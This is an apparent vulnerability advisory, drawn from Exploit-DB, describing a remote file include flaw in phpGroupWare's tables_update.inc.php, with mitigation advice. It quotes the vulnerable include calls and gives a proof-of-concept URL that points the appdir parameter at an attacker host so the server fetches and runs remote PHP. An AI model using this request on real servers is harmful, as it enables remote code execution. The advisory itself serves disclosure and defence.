Remote File Include Vulnerability in phpGroupWare

vendor:

phpGroupWare

by:

7.5

CVSS

HIGH

Remote File Include

CWE

Product Name: phpGroupWare

Affected Version From:

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

Remote File Include Vulnerability in phpGroupWare

The phpGroupWare software is prone to a remote file include vulnerability that may allow an attacker to execute arbitrary PHP code. The vulnerability exists in the 'tables_update.inc.php' script, which includes other PHP files without proper validation. An attacker can exploit this vulnerability by supplying a malicious file parameter in the URL, leading to the execution of the included PHP code.

Mitigation:

To mitigate this vulnerability, it is recommended to update to a patched version of phpGroupWare or apply the necessary security patches provided by the vendor. Additionally, it is advised to validate and sanitize user-supplied input before including files in PHP scripts.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/12074/info

phpGroupWare is prone to a remote file include vulnerability, potentially allowing the execution of malicious PHP code. This would occur in the context of the affected web server. 

The tables_update.inc.php script contains the following include calls:
/* Include older phpGroupWare update support */
include($appdir . 'tables_update_0_9_9.inc.php');
include($appdir . 'tables_update_0_9_10.inc.php');
include($appdir . 'tables_update_0_9_12.inc.php');

For example supplying the following file:
tables_update_0_9_9.inc.php = <?php print "<?php phpinfo();?>" ;?>

The following request will execute the phpinfo() command on the vulnerable target:

http://[victim]/[phpgroupware_directory]/phpgwapi/setup/tables_update.inc.php?appdir=http://[attacker]/